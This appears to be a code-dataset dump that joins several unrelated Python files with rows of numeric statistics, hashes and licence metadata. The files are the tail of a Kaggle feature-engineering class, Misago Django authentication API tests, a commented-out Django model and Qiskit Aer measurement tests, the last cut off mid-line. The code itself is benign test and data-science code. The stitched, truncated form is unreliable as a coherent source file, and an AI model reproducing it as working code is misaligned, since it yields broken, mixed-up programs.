'770bef1c6', '07c9d1f37', 'ff793343c', 'c83ce87d0', '7ba2e35d6', '027e67ec7', '43d99f930', '7eacd712f', 'c90b0b8a7', '939ae6e4a', '1e783ae1e', 'ebaaead05', '7417a6759', '260ff750c', 'ee99f8a68', '78144b68c', 'ce47f8cae', 'fb59499f9', '8ff55a752', '25a2e8b49', 'f9870621e', '27c5d13c9', '8cc831c8b', '2e51c4645', 'b169c8b90'), ('ca45bdef0', 'b4ff45038', '867c937bb', '546e67d8f', 'bf406b82b', '5dfd0ef29', '0c9516742', 'd72f25c1e', 'b9b7f388d', '4ddc6b32c', 'ed9e99c25', 'cef8a06cb', 'a7f6bf4a9', 'cc5570957', '1472ad855', '3f931e2b5', 'f4e855860', '605728195', '6186ea570', 'dd2ad0776', 'f6523474a', 'ffa903344', '20a58c359', 'af9c1bd29', 'ec863cb52', 'db6ba896a', '906d4316d', '5680531f3', '82df5774d', '5ea2238fd', 'b287947cc', '80c0c9910', '46ba3a162', 'd279be266', '66b39545f', 'e26149c9e', 'e1ccfad87', '5f9879270', '1d593ae5b', '2a7ac8010'), ('ccc7609f4', 'ca7ea80a3', 'e509be270', '3b8114ab0', 'a355497ac', 
'27998d0f4', 'fa05fd36e', '81aafdb57', '4e22de94f', 'f0d5ffe06', '9af753e9d', 'f1b6cc03f', '567d2715c', '857020d0f', '99fe351ec', '3e5dab1e3', '001476ffa', '5a5eabaa7', 'cb5587baa', '32cab3140', '313237030', '0f6386200', 'b961b0d59', '9452f2c5f', 'bcfb439ee', '04a22f489', '7e58426a4', 'a4c9ea341', 'ffdc4bcf8', '1a6d866d7', 'd7334935b', '298db341e', '08984f627', '8367dfc36', '5d9f43278', '7e3e026f8', '37c10d610', '5a88b7f01', '324e49f36', '99f466457'), ('ced6a7e91', '9df4daa99', '83c3779bf', 'edc84139a', 'f1e0ada11', '73687e512', 'aa164b93b', '342e7eb03', 'cd24eae8a', '8f3740670', '2b2a10857', 'a00adf70e', '3a48a2cd2', 'a396ceeb9', '9280f3d04', 'fec5eaf1a', '5b943716b', '22ed6dba3', '5547d6e11', 'e222309b0', '5d3b81ef8', '1184df5c2', '2288333b4', 'f39074b55', 'a8b721722', '13ee58af1', 'fb387ea33', '4da206d28', 'ea4046b8d', 'ef30f6be5', 'b85fa8b27', '2155f5e16', '794e93ca6', '070f95c99', '939f628a7', '7e814a30d', 'a6e871369', '0dc4d6c7d', 'bc70cbc26', 'aca228668'), ('d0d340214', '34d3715d5', '9c404d218', 'c624e6627', 'a1b169a3a', 'c144a70b1', 'b36a21d49', 'dfcf7c0fa', 'c63b4a070', '43ebb15de', '1f2a670dd', '3f07a4581', '0b1560062', 'e9f588de5', '65d14abf0', '9ed0e6ddb', '0b790ba3a', '9e89978e3', 'ee6264d2b', 'c86c0565e', '4de164057', '87ba924b1', '4d05e2995', '2c0babb55', 'e9375ad86', '8988e8da5', '8a1b76aaf', '724b993fd', '654dd8a3b', 'f423cf205', '3b54cc2cf', 'e04141e42', 'cacc1edae', '314396b31', '2c339d4f2', '3f8614071', '16d1d6204', '80b6e9a8b', 'a84cbdab5', '1a6d13c4a'), ('d48c44c49', 'e926d89d3', '4c0845957', '892f6f03e', '61b88b77a', '207021f50', 'bb12b7d99', 'e17a13988', 'bfe5872ea', '788e6045c', '8291f21d8', '36ba6bac3', '66e323ce9', 'a05f1bb14', 'b379107b3', '084031585', '571380d69', '640a36efb', '5a53ebb69', '33288f3b2', '32138f717', 'dd4649092', '8f993c285', '7b58b1340', 'a3fb71dbd', '773c101b5', '7f6e612c7', '122df5341', 'f95a762b0', '052f67cfa', 'c03c8799c', 'a3ef40228', 'e0ceabad4', '3c27b0b28', 'd833db6e1', '9303c6806', '36d35623e', '208308a47', 
'2f587f6a4', '23099cfb2'), ('df03d1653', '7fd35c77a', '133e6f674', '643ef6977', '9539d34c8', '9d2835f75', 'acc744336', 'c8a66413e', 'b80f3eab2', '437ff8730', 'e289bbcc3', 'dd48ed481', '90db65912', '9eab942f8', '753e0a307', '5e1085022', 'a4529b4ef', 'c9c6b51aa', '1346d1df0', '0a9735aba', '64226e620', 'de5e74ae7', 'd00f7d768', 'b4e4a184a', 'ef139d7ac', 'a6f5de07f', 'cb9333bd7', '4dfa4bc61', '5089bf842', '6f44294b2', 'ae1bd05ee', 'f807767c5', '067bcb836', 'd1cf68555', 'e5499c39d', '0bb06f4b5', 'b6336ff10', 'a84bafe34', '3e37bffde', '093b92da5'), ('df838756c', '2cb73ede7', '4dcf81d65', '61c1b7eb6', 'a9f61cf27', '1af4d24fa', 'e13b0c0aa', 'b9ba17eb6', '796c218e8', '37f57824c', 'd1e0f571b', 'f9e3b03b7', 'a3ef69ad5', 'e16a20511', '04b88be38', '99e779ee0', '9f7b782ac', '1dd7bca9f', '2eeadde2b', '6df033973', 'cdfc2b069', '031490e77', '5324862e4', '467bee277', 'a3fb07bfd', '64c6eb1cb', '8618bc1fd', '6b795a2bc', '956d228b9', '949ed0965', 'a4511cb0b', 'b64425521', '2e3c96323', '191e21b5f', 'bee629024', '1977eaf08', '5e645a169', '1d04efde3', '8675bec0b', '8337d1adc'), ('e1c250dbf', '81e3fed66', '4fc9da4e3', '175891ff4', '0b2e88d2d', '006e72749', 'f29217d2f', 'f6240919f', '232ecc840', 'd4087a281', '398cdc105', '3b67e9641', '73eeb092f', '06283f348', 'd7db08081', '2585a26fe', 'da59aa67e', '638d0b2e0', 'afc08501b', 'd974e8584', '433d408b2', '0989e152f', '357784061', '2e22a32fd', '184166328', '81f4bc3d8', 'd9fbf30dd', '5d52b2d2b', '0895b9597', '422acfada', 'a1868e9ec', '98c05b5b4', '8ff5cf8c3', 'bf257a3bc', 'f86eabcb9', 'c77f6dbfe', '014574363', 'bf2b3327b', '74f15ad1c', '7d9979702'), ('e20edfcb8', '842415efb', '300d6c1f1', '720f83290', '069a2c70b', '87a91f998', '611151826', '74507e97f', '504e4b156', 'baa95693d', 'cb4f34014', '5239ceb39', '81e02e0fa', 'dfdf4b580', 'fc9d04cd7', 'fe5d62533', 'bb6260a44', '08d1f69ef', 'b4ced4b7a', '98d90a1d1', 'b6d206324', '6456250f1', '96f5cf98a', 'f7c8c6ad3', 'cc73678bf', '5fb85905d', 'cb71f66af', '212e51bf6', 'd318bea95', 'b70c62d47', '11d86fa6a', 
'3988d0c5e', '42cf36d73', '9f494676e', '1c68ee044', 'a728310c8', '612bf9b47', '105233ed9', 'c18cc7d3d', 'f08c20722'), ('ec5764030', '42fdff3a0', 'fa6e76901', '6e76d5df3', '1c486f8dd', '2daf6b624', '9562ce5c8', 'cbf236577', '8e1822aa3', 'fd9968f0d', 'ed1f680d4', '6bd9d9ae3', '896d1c52d', 'b41a9fc75', 'a60974604', '9d6b84f39', '5661462ee', '186b87c05', 'e5ac02d3c', '0c4bf4863', '1fba6a5d5', '4f2f6b0b3', 'cd8048913', 'e17f1f07c', '707f193d9', '8ca08456c', '3adf5e2b5', 'a60027bb4', 'e7071d5e3', 'c7ae29e66', '50780ec40', 'f8b733d3f', '8485abcab', '994b4c2ac', '6af8b2246', 'dd85a900c', 'ccb68477c', '715fa74a4', 'adadb9a96', '77eb013ca'), ('f0317ca4f', '402b0d650', '7e78d546b', '2ad744c57', '47abb3cb4', '71ac2b961', '5b8c88c94', '293e2698e', '4bdeca0d2', '2ef8b7f4f', 'c380056bb', '2488e17f5', '20442bac4', '8e8736fc8', '8a4c53d3e', '62c547c8e', '86f13324d', 'da52febdb', '64e38e7a2', 'b0310a768', '0d866c3d7', '34a2f580b', '24bcc2f15', 'e1e8947d8', '05f11f48f', '8c8616b62', '79e0c374a', 'ad1466df8', 'f642213a6', 'f8405f8b9', '1ae0db9d5', '9dbb6b717', '0f7ae26ce', '81ec47b4c', 'ad4e33a4c', 'a78f85d49', '8de6fcbf1', '3ecc09859'), ('f0317ca4f', '402b0d650', '7e78d546b', '2ad744c57', '47abb3cb4', '71ac2b961', '5b8c88c94', '293e2698e', '4bdeca0d2', '2ef8b7f4f', 'c380056bb', '2488e17f5', '20442bac4', '8e8736fc8', '8a4c53d3e', '62c547c8e', '86f13324d', 'da52febdb', '64e38e7a2', 'b0310a768', '0d866c3d7', '34a2f580b', '24bcc2f15', 'e1e8947d8', '05f11f48f', '8c8616b62', '79e0c374a', 'ad1466df8', 'f642213a6', 'f8405f8b9', '1ae0db9d5', '9dbb6b717', '0f7ae26ce', '81ec47b4c', 'ad4e33a4c', 'a78f85d49', '8de6fcbf1', '3ecc09859', 'd2ef684ed', '9e39c29d0'), ('f1eeb56ae', '62ffce458', '497adaff8', 'ed1d5d137', 'faf7285a1', 'd83da5921', '0231f07ed', '7950f4c11', '051410e3d', '39e1796ab', '2e0148f29', '312832f30', '6f113540d', 'f3ee6ba3c', 'd9fc63fa1', '6a0b386ac', '5747a79a9', '64bf3a12a', 'c110ee2b7', '1bf37b3e2', 'fdd07cac1', '0872fe14d', 'ddef5ad30', '42088cf50', '3519bf4a4', 'a79b1f060', 
'97cc1b416', 'b2790ef54', '1a7de209c', '2a71f4027', 'f118f693a', '15e8a9331', '0c545307d', '363713112', '73e591019', '21af91e9b', '62a915028', '2ab5a56f5', 'a8ee55662', '316b978cd'), ('f3cf9341c', 'fa11da6df', 'd47c58fe2', '0d5215715', '555f18bd3', '134ac90df', '716e7d74d', 'c00611668', '1bf8c2597', '1f6b2bafa', '174edf08a', 'f1851d155', '5bc7ab64f', 'a61aa00b0', 'b2e82c050', '26417dec4', '53a550111', '51707c671', 'e8d9394a0', 'cbbc9c431', '6b119d8ce', 'f296082ec', 'be2e15279', '698d05d29', '38e6f8d32', '93ca30057', '7af000ac2', '1fd0a1f2a', '41bc25fef', '0df1d7b9a', '88d29cfaf', '2b2b5187e', 'bf59c51c3', 'cfe749e26', 'ad207f7bb', '11114a47a', '341daa7d1', 'a8dd5cea5', '7b672b310', 'b88e5de84'), ('fec5644cf', 'caa9883f6', '9437d8b64', '68811ba58', 'ef4b87773', 'ff558c2f2', '8d918c64f', '0b8e10df6', '2d6565ce2', '0fe78acfa', 'b75aa754d', '2ab9356a0', '4e86dd8f3', '348aedc21', 'd7568383a', '856856d94', '69900c0d1', '02c21443c', '5190d6dca', '20551fa5b', '79cc300c7', '8d8276242', 'da22ed2b8', '89cebceab', 'f171b61af', '3a07a8939', '129fe0263', 'e5b2d137a', 'aa7223176', '5ac7e84c4', '9bd66acf6', '4c938629c', 'e62c5ac64', '57535b55a', 'a1a0084e3', '2a3763e18', '474a9ec54', '0741f3757', '4fe8b17c2', 'd5754aa08')] # noqa 501 if dataset == 'train': x = [np.expand_dims(self.train_df.drop(["target"], axis=1)[ list(c)].values, axis=-1) for c in cols if len(c) == 40] if logloss: y = np.log1p(self.train_df["target"].values) else: y = self.train_df["target"].values if round_targets: y = np.around(y, decimals=round_targets) return np.concatenate(x, axis=-1), y elif dataset == 'test': x = [np.expand_dims(self.test_df[list(c)].values, axis=-1) for c in cols if len(c) == 40] return np.concatenate(x, axis=-1) def add_IsTargetAvaliable_as_feature(self, params=None, test=True, verbose=True, random_seed=43, threshold='soft', calc_on_selected_feat=False): '''Use a LightGBM model to predict if the target is one of the cols in the row''' if not params: params = { 'objective': 'binary', 
'num_leaves': 20, 'min_data_in_leaf': 20, 'bagging_fraction': 0.6143, 'bagging_freq': 3, 'feature_fraction': 0.6453, 'min_split_gain': np.power(10, -2.5988), 'lambda_l1': np.power(10, -2.2887), 'lambda_l2': np.power(10, 1.7570), 'min_child_weight': np.power(10, -0.1477), 'verbose': -1, 'seed': 3, 'boosting_type': 'gbdt', 'max_depth': -1, 'learning_rate': 0.05, # 0.05 'metric': 'rmse', 'device': 'cpu', 'num_threads': 8 } model = LightGBM(**params) if calc_on_selected_feat: train_df = self.keep_only_selected_features( 'train', return_only=True) x = train_df.drop('target', axis=1).values x = np.concatenate([x, self.train_agg.values], axis=-1) target = train_df['target'].values y = np.array([target[i] in x[i] for i in range(x.shape[0])]).astype(np.int) else: x, target = self.get_train_data( use_aggregates=True, logloss=False) y = np.array([target[i] in x[i] for i in range(x.shape[0])]).astype(np.int) if test: if calc_on_selected_feat: test_df = self.keep_only_selected_features( 'test', return_only=True) x_test = test_df.values else: x_test = self.get_test_data() test_feat = model.cv_predict(x, y, x_test, random_seed=random_seed, logloss=False, return_oof_pred=False) else: model.cv(x, y, random_seed=random_seed, oof_pred=False) # Add to aggregates train_agg = pd.DataFrame(dict(is_label=y), index=self.train_df.index) self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if test: if threshold == 'hard': thresh = 0.5 elif threshold == 'soft': thresh = 1572 / (2887 + 1572) else: raise (('Invalid threshold param, must be', 'either "hard" or "soft"')) test_feat[test_feat <= thresh] = 0 test_feat[test_feat > thresh] = 1 test_agg = pd.DataFrame( dict(is_label=test_feat), index=self.test_df.index) self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def get_validation_set_from_leaky_test(self, sub_path, logloss=False, return_index=False): '''Use leaky rows from test as validation set''' val_df = load_df_from_path(sub_path) idx = list(val_df[val_df.target > 
0].index) val_df = val_df.target.values X_test = self.get_test_data()[val_df > 0] Y_test = val_df[val_df > 0] if logloss: Y_test = np.log1p(Y_test) if return_index: return idx, X_test, Y_test else: return X_test, Y_test # def get_train_data_plus_leaky_test_rows(self, **kwargs): # '''Get leaky test rows as additional training data''' # get_train_data if __name__ == '__main__': train_path = './train.csv' test_path = './test.csv' dataset = KaggleDataset(train_path, test_path=test_path) print(dataset.train_df.describe(), dataset.test_df.describe())
149.918632
44,542
0.653554
11,626
127,131
7.044641
0.315242
0.013419
0.013016
0.010989
0.905178
0.89099
0.878903
0.869061
0.860795
0.853616
0
0.362693
0.14688
127,131
847
44,543
150.095632
0.392447
0.027704
0
0.38209
0
0.002985
0.523233
0.005932
0
0
0
0
0.002985
1
0.049254
false
0
0.035821
0
0.120896
0.022388
0
0
0
null
0
0
0
1
1
1
1
1
1
0
1
0
0
0
1
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
40d36b560fb0ff461130b08c0480db6262a03251
16,298
py
Python
misago/users/tests/test_auth_api.py
HenryChenV/iJiangNan
68f156d264014939f0302222e16e3125119dd3e3
[ "MIT" ]
1
2017-07-25T03:04:36.000Z
2017-07-25T03:04:36.000Z
misago/users/tests/test_auth_api.py
HenryChenV/iJiangNan
68f156d264014939f0302222e16e3125119dd3e3
[ "MIT" ]
null
null
null
misago/users/tests/test_auth_api.py
HenryChenV/iJiangNan
68f156d264014939f0302222e16e3125119dd3e3
[ "MIT" ]
null
null
null
from django.contrib.auth import get_user_model from django.core import mail from django.test import TestCase from misago.users.models import Ban from misago.users.tokens import make_password_change_token UserModel = get_user_model() class GatewayTests(TestCase): def test_api_invalid_credentials(self): """login api returns 400 on invalid POST""" response = self.client.post( '/api/auth/', data={ 'username': 'nope', 'password': 'nope', } ) self.assertContains(response, "Login or password is incorrect.", status_code=400) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) def test_login(self): """api signs user in""" user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 200) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertEqual(user_json['id'], user.id) self.assertEqual(user_json['username'], user.username) def test_login_whitespaces_password(self): """api signs user in with password left untouched""" user = UserModel.objects.create_user('Bob', 'bob@test.com', ' Pass.123 ') response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': ' Pass.123 ', }, ) self.assertEqual(response.status_code, 200) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertEqual(user_json['id'], user.id) self.assertEqual(user_json['username'], user.username) def test_submit_empty(self): """login api errors for no body""" response = self.client.post('/api/auth/') self.assertContains(response, 'empty_data', status_code=400) def 
test_login_banned(self): """login api fails to sign banned user in""" UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') ban = Ban.objects.create( check_type=Ban.USERNAME, banned_value='bob', user_message='You are tragically banned.', ) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response_json = response.json() self.assertEqual(response_json['code'], 'banned') self.assertEqual(response_json['detail']['message']['plain'], ban.user_message) self.assertEqual( response_json['detail']['message']['html'], '<p>%s</p>' % ban.user_message ) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) def test_login_banned_staff(self): """login api signs banned staff member in""" user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') user.is_staff = True user.save() Ban.objects.create( check_type=Ban.USERNAME, banned_value='bob', user_message='You are tragically banned.', ) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 200) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertEqual(user_json['id'], user.id) self.assertEqual(user_json['username'], user.username) def test_login_inactive_admin(self): """login api fails to sign admin-activated user in""" UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123', requires_activation=1) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response_json = response.json() self.assertEqual(response_json['code'], 'inactive_user') response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() 
self.assertIsNone(user_json['id']) def test_login_inactive_user(self): """login api fails to sign user-activated user in""" UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123', requires_activation=2) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response_json = response.json() self.assertEqual(response_json['code'], 'inactive_admin') response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) def test_login_disabled_user(self): """its impossible to sign in to disabled account""" user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123', is_active=False) user.is_staff = True user.save() response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertContains(response, "Login or password is incorrect.", status_code=400) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) class UserCredentialsTests(TestCase): def test_edge_returns_response(self): """api edge has no showstoppers""" response = self.client.get('/api/auth/criteria/') self.assertEqual(response.status_code, 200) class SendActivationAPITests(TestCase): def setUp(self): self.user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') self.user.requires_activation = 1 self.user.save() self.link = '/api/auth/send-activation/' def test_submit_valid(self): """request activation link api sends reset link mail""" response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Activate Bob', mail.outbox[0].subject) def test_submit_banned(self): """request activation link api passes for banned users""" Ban.objects.create( check_type=Ban.USERNAME, banned_value=self.user.username, 
user_message='Nope!', ) response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Activate Bob', mail.outbox[0].subject) def test_submit_disabled(self): """request activation link api fails disabled users""" self.user.is_active = False self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_empty(self): """request activation link api errors for no body""" response = self.client.post(self.link) self.assertContains(response, 'empty_email', status_code=400) self.assertTrue(not mail.outbox) def test_submit_invalid(self): """request activation link api errors for invalid email""" response = self.client.post( self.link, data={ 'email': 'fake@mail.com', }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_active_user(self): """request activation link api errors for active user""" self.user.requires_activation = 0 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'Bob, your account is already active.', status_code=400) def test_submit_inactive_user(self): """request activation link api errors for admin-activated users""" self.user.requires_activation = 2 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'inactive_admin', status_code=400) self.assertTrue(not mail.outbox) # but succeed for user-activated self.user.requires_activation = 1 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, } ) self.assertEqual(response.status_code, 200) self.assertTrue(mail.outbox) class SendPasswordFormAPITests(TestCase): def setUp(self): self.user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') self.link 
= '/api/auth/send-password-form/' def test_submit_valid(self): """request change password form link api sends reset link mail""" response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Change Bob password', mail.outbox[0].subject) def test_submit_banned(self): """request change password form link api sends reset link mail""" Ban.objects.create( check_type=Ban.USERNAME, banned_value=self.user.username, user_message='Nope!', ) response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Change Bob password', mail.outbox[0].subject) def test_submit_disabled(self): """request change password form api fails disabled users""" self.user.is_active = False self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_empty(self): """request change password form link api errors for no body""" response = self.client.post(self.link) self.assertContains(response, 'empty_email', status_code=400) self.assertTrue(not mail.outbox) def test_submit_invalid(self): """request change password form link api errors for invalid email""" response = self.client.post( self.link, data={ 'email': 'fake@mail.com', }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_inactive_user(self): """request change password form link api errors for inactive users""" self.user.requires_activation = 1 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'inactive_user', status_code=400) self.user.requires_activation = 2 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'inactive_admin', status_code=400) 
self.assertTrue(not mail.outbox) class ChangePasswordAPITests(TestCase): def setUp(self): self.user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') self.link = '/api/auth/change-password/%s/%s/' def test_submit_valid(self): """submit change password form api changes password""" response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)), data={ 'password': 'n3wp4ss!', }, ) self.assertEqual(response.status_code, 200) user = UserModel.objects.get(id=self.user.pk) self.assertTrue(user.check_password('n3wp4ss!')) def test_submit_with_whitespaces(self): """submit change password form api changes password with whitespaces""" response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)), data={ 'password': ' n3wp4ss! ', }, ) self.assertEqual(response.status_code, 200) user = UserModel.objects.get(id=self.user.pk) self.assertTrue(user.check_password(' n3wp4ss! ')) def test_invalid_token_link(self): """api errors on invalid user id link""" response = self.client.post(self.link % (self.user.pk, 'asda7ad89sa7d9s789as')) self.assertContains(response, "Form link is invalid.", status_code=400) def test_banned_user_link(self): """request errors because user is banned""" Ban.objects.create( check_type=Ban.USERNAME, banned_value=self.user.username, user_message='Nope!', ) response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "Your link has expired.", status_code=400) def test_inactive_user(self): """change password api errors for inactive users""" self.user.requires_activation = 1 self.user.save() response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "Your link has expired.", status_code=400) self.user.requires_activation = 2 self.user.save() response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) 
self.assertContains(response, "Your link has expired.", status_code=400) def test_disabled_user(self): """change password api errors for disabled users""" self.user.is_active = False self.user.save() response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "Form link is invalid.", status_code=400) def test_submit_empty(self): """change password api errors for empty body""" response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "This password is too shor", status_code=400)
31.46332
96
0.582157
1,798
16,298
5.151279
0.07842
0.04837
0.081624
0.078385
0.872166
0.85284
0.813755
0.801987
0.774563
0.758475
0
0.018544
0.295251
16,298
517
97
31.524178
0.787829
0.089213
0
0.701333
0
0
0.103927
0.005921
0
0
0
0
0.194667
1
0.088
false
0.109333
0.013333
0
0.114667
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
40dde4729546450d0598707b5cb861ccc65de6fa
699
py
Python
website/models.py
folse/MTS
183f7d479d5f6f90ad1bdd6a20d7ec334476dce1
[ "MIT" ]
null
null
null
website/models.py
folse/MTS
183f7d479d5f6f90ad1bdd6a20d7ec334476dce1
[ "MIT" ]
null
null
null
website/models.py
folse/MTS
183f7d479d5f6f90ad1bdd6a20d7ec334476dce1
[ "MIT" ]
null
null
null
#coding: utf-8 from django.db import models from django.contrib.auth.models import User # class PlaceModel(models.Model): # user = models.OneToOneField(User) # objectId = models.CharField(max_length=256) # name = models.CharField(max_length=32) # address = models.CharField(max_length=256) # category = models.CharField(max_length=128) # phone = models.CharField(max_length=32) # #photo = models.CharField(max_length=512) # open_hour = models.CharField(max_length=128) # latitude = models.CharField(max_length=32) # longitude = models.CharField(max_length=32) # news = models.CharField(max_length=512) # description = models.CharField(max_length=512)
41.117647
52
0.723891
90
699
5.488889
0.377778
0.334008
0.40081
0.534413
0.593117
0
0
0
0
0
0
0.050847
0.155937
699
17
52
41.117647
0.786441
0.854077
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
90526a32540c0b6cdf12a459ebe106f7cc0a7200
6,177
py
Python
test/terra/backends/qasm_simulator/qasm_measure.py
eliarbel/qiskit-aer
827f8922948dd18a588e8617bccaec465934280f
[ "Apache-2.0" ]
1
2019-07-26T05:04:14.000Z
2019-07-26T05:04:14.000Z
test/terra/backends/qasm_simulator/qasm_measure.py
eliarbel/qiskit-aer
827f8922948dd18a588e8617bccaec465934280f
[ "Apache-2.0" ]
29
2018-12-19T10:11:00.000Z
2018-12-19T10:16:18.000Z
test/terra/backends/qasm_simulator/qasm_measure.py
atilag/qiskit-aer
d964795b0a24b1d3287ba2ba2dda45d1dfed4a5d
[ "Apache-2.0" ]
null
null
null
# This code is part of Qiskit. # # (C) Copyright IBM 2018, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ QasmSimulator Integration Tests """ from test.terra.reference import ref_measure from qiskit.compiler import assemble from qiskit.providers.aer import QasmSimulator class QasmMeasureTests: """QasmSimulator measure tests.""" SIMULATOR = QasmSimulator() BACKEND_OPTS = {} # --------------------------------------------------------------------- # Test measure # --------------------------------------------------------------------- def test_measure_deterministic_with_sampling(self): """Test QasmSimulator measure with deterministic counts with sampling""" shots = 100 circuits = ref_measure.measure_circuits_deterministic( allow_sampling=True) targets = ref_measure.measure_counts_deterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_deterministic_without_sampling(self): """Test QasmSimulator measure with deterministic counts without sampling""" shots = 100 circuits = ref_measure.measure_circuits_deterministic( allow_sampling=False) targets = ref_measure.measure_counts_deterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_nondeterministic_with_sampling(self): """Test QasmSimulator measure with 
non-deterministic counts with sampling""" shots = 2000 circuits = ref_measure.measure_circuits_nondeterministic( allow_sampling=True) targets = ref_measure.measure_counts_nondeterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots) def test_measure_nondeterministic_without_sampling(self): """Test QasmSimulator measure with nin-deterministic counts without sampling""" shots = 2000 circuits = ref_measure.measure_circuits_nondeterministic( allow_sampling=False) targets = ref_measure.measure_counts_nondeterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots) # --------------------------------------------------------------------- # Test multi-qubit measure qobj instruction # --------------------------------------------------------------------- def test_measure_deterministic_multi_qubit_with_sampling(self): """Test QasmSimulator multi-qubit measure with deterministic counts with sampling""" shots = 100 qobj = ref_measure.measure_circuits_qobj_deterministic( allow_sampling=True) qobj.config.shots = shots circuits = [experiment.header.name for experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_deterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_deterministic_multi_qubit_without_sampling(self): """Test QasmSimulator multi-qubit measure with deterministic counts without sampling""" shots = 100 qobj = ref_measure.measure_circuits_qobj_deterministic( allow_sampling=False) qobj.config.shots = shots circuits = [experiment.header.name for 
